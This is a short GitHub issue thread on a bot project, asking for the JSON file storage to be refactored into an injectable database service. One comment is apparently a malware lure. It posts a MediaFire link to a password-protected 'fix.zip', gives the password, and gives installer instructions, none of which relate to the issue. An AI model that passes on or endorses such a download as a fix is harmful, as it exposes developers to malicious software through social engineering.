### ISSUE TITLE
Add database support

### ISSUE THREAD

**Issue by wolfhoundjesse** [wolfhoundjesse/foxhole-stockpiles-bot#3]
Currently a tightly-coupled service for writing to JSON files has been implemented. This needs to be refactored to support dependency injection, and a database service needs to be written.

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wolfhoundjesse** [comment]
Closed by 94fe520d497a75adbc12441a7a7f1b4257bcf4a9
